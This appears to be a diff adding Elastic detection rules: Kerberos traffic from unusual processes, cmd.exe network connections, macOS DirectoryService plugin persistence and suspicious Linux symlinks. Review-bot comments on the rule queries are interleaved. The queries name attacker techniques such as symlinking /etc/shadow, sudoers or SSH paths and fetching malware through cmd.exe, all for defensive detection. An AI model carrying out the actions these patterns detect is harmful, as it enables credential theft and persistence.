@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network connections to the standard Kerberos port from an unusual process. On Windows, the only process that normally performs Kerberos traffic from a domain joined host is lsass.exe.", + "false_positives": [ + "HTTP traffic on a non standard port. Verify that the destination IP address is not related to a Domain Controller." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kerberos Traffic from Unusual Process", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program 
Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program 
Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation 
Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "897dc6b5-b39f-432a-8d75-d3730d50c782_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107.json new file mode 100644 index 00000000000..95685b24c53 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies cmd.exe making a network connection. Adversaries could abuse cmd.exe to download or execute malware from a remote URL.", + "false_positives": [ + "Administrators may use the command prompt for regular administrative tasks. It's important to baseline your environment for network connections being made from the command prompt to determine any abnormal use of this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Prompt Network Connection", + "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and\n not dns.question.name : (\n \"wpad\", \"localhost\", \"ocsp.comodoca.com\", \"ocsp.digicert.com\", \"ocsp.sectigo.com\", \"crl.comodoca.com\"\n )]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + 
"risk_score": 21, + "rule_id": "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_106.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_106.json new file mode 100644 index 00000000000..1160d651838 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_106.json 
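Review bot: The `cidrmatch` exclusion list in the query omits `fc00::/7`, the IPv6 unique-local range that is the counterpart of the RFC 1918 blocks it already excludes, so a cmd.exe connection to an internal IPv6-only host will alert despite the guide's stated intent of catching connections to external addresses; suggest adding `"fc00::/7"` next to `"FE80::/10"`. Separately, unlike the two 897dc6b5 rules added in this change, this rule sets no `timestamp_override` and carries no `setup` guidance about `event.ingested`; if that is deliberate for a `sequence` rule, a short `false_positives` or description sentence saying so would help reviewers of later versions.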
@@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a DirectoryService PlugIns (dsplug) file. The DirectoryService daemon launches on each system boot and automatically reloads after crash. It scans and executes bundles that are located in the DirectoryServices PlugIns folder and can be abused by adversaries to maintain persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Persistence via DirectoryService Plugin Modification", + "query": "event.category:file and host.os.type:macos and not event.type:deletion and\n file.path:/Library/DirectoryServices/PlugIns/*.dsplug\n", + "references": [ + "https://blog.chichou.me/2019/11/21/two-macos-persistence-tricks-abusing-plugins/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "89fa6cb7-6b53-4de2-b604-648488841ab8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "89fa6cb7-6b53-4de2-b604-648488841ab8_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_5.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_5.json new file mode 100644 index 00000000000..f2205118396 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_5.json 
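Review bot: The `query` matches `file.path:/Library/DirectoryServices/PlugIns/*.dsplug` against a field that `required_fields` declares as `keyword`, so the wildcard match is case-sensitive, while the default macOS filesystem is case-insensitive; consider a case-insensitive form of the path match so the rule covers every spelling the OS itself accepts. This rule also ships without a `note` investigation guide and without the `Resources: Investigation Guide` tag that the other persistence rules in this diff carry, so an analyst triaging a hit gets only the one-paragraph `description`. A short "Triage and analysis" section listing the writing process, the bundle path and whether the file is signed would bring it in line with the rest of the package.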
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Symbolic Link Created", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"ln\" and process.args in (\"-s\", \"-sf\") and \n (\n /* suspicious files */\n (process.args in (\"/etc/shadow\", \"/etc/shadow-\", \"/etc/shadow~\", \"/etc/gshadow\", \"/etc/gshadow-\") or \n (process.working_directory == \"/etc\" and process.args in (\"shadow\", \"shadow-\", \"shadow~\", \"gshadow\", \"gshadow-\"))) or \n \n /* suspicious bins */\n (process.args in (\"/bin/bash\", \"/bin/dash\", \"/bin/sh\", \"/bin/tcsh\", \"/bin/csh\", \"/bin/zsh\", \"/bin/ksh\", \"/bin/fish\") or \n (process.working_directory == \"/bin\" and process.args : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))) or \n (process.args in (\"/usr/bin/bash\", \"/usr/bin/dash\", \"/usr/bin/sh\", \"/usr/bin/tcsh\", \"/usr/bin/csh\", \"/usr/bin/zsh\", \"/usr/bin/ksh\", \"/usr/bin/fish\") or \n (process.working_directory == \"/usr/bin\" and process.args in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))) or\n \n /* suspicious locations */\n (process.args : (\"/etc/cron.d/*\", \"/etc/cron.daily/*\", \"/etc/cron.hourly/*\", 
\"/etc/cron.weekly/*\", \"/etc/cron.monthly/*\")) or\n (process.args : (\"/home/*/.ssh/*\", \"/root/.ssh/*\",\"/etc/sudoers.d/*\", \"/dev/shm/*\"))\n ) and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and \n not user.Ext.real.id == \"0\" and not group.Ext.real.id == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "8a024633-c444-45c0-a4fe-78128d8c1ab6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "8a024633-c444-45c0-a4fe-78128d8c1ab6_5", + "type": "security-rule" +} \ No newline at end of file 
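Review bot: The trailing filter `not user.Ext.real.id == "0" and not group.Ext.real.id == "0"` relies on two non-ECS fields (`"ecs": false`, `"type": "unknown"` in `required_fields`), yet the rule indexes `endgame-*` and is tagged `Data Source: Elastic Endgame`; if those fields are not populated on Endgame events, the negated equality evaluates to null and those events never match, so the data-source claim should be verified or the exclusion made conditional on the field being present. A smaller consistency point in the `/bin` branch: it uses `process.args : ("bash", ...)` (case-insensitive wildcard match) while the `/usr/bin` and `/etc` branches use `process.args in (...)`; pick one form. The `setup` text also links `fleet/8.10/agent-policy.html` where every other rule in this diff links `fleet/current/agent-policy.html`.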
diff --git a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_3.json new file mode 100644 index 00000000000..70895a3a31f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_3.json 
